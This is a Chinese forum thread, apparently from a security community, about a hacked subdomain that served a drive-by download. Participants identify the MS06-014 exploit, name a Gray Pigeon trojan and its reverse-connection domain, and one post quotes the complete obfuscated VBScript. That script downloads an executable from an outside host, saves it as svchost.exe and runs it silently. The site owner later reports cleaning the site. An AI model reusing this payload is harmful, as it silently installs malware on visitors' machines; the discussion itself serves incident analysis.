谢谢你告知，这二级域名是送给monkeycz用了，monkeycz会处理的。

现在还没改过来，我特意浏览了下，好像没什么事情发生

黑客动画吧
www.hack58.com

下了半天那个马也没下下来...连接不上.

最初由 快雪时晴 发布
现在还没改过来，我特意浏览了下，好像没什么事情发生

0614 MS漏洞利用的.你打了补定肯定什么都没发生拉.

最初由 LOCKLOSE 发布
下了半天那个马也没下下来...连接不上.

BS马甲.拖出去砍了
是个灰鸽子.我研究了下

反向地址是 adminia.3322.org

就我的理解，浏览器的功能应限定为下载东西，然后显示出来即可，不知道ms为什么会支持网页代码执行Q.ShellExecute之类危险的操作。

<SCRIPT language=VBScript>
    on error resume next
    dl = "http://www.gx-gm.com/admin/3322.exe"
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")
    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1
    str6="GET"
    x.Open str6, dl, False
    x.Send
    fname1="svchost.exe"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2)
    S.open
    fname1= F.BuildPath(tmp,fname1)
   
    S.write x.responseBody
    S.savetofile fname1,2
    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0
    </SCRIPT>

可惜我没遇到

最初由 fslove 发布
今天机器突然不能打开看雪论坛了.百度一搜索.找到了下面的域名
http://monkeycz.pediy.com/

说了好久还没解决问题,.

........

非常感谢你的提醒。

整站已经重新更新过了，我测试了一下，应该没有挂马的地方了。

现在网站已经恢复正常。如果有哪位朋友发现异常，麻烦通知我一声，先谢过了。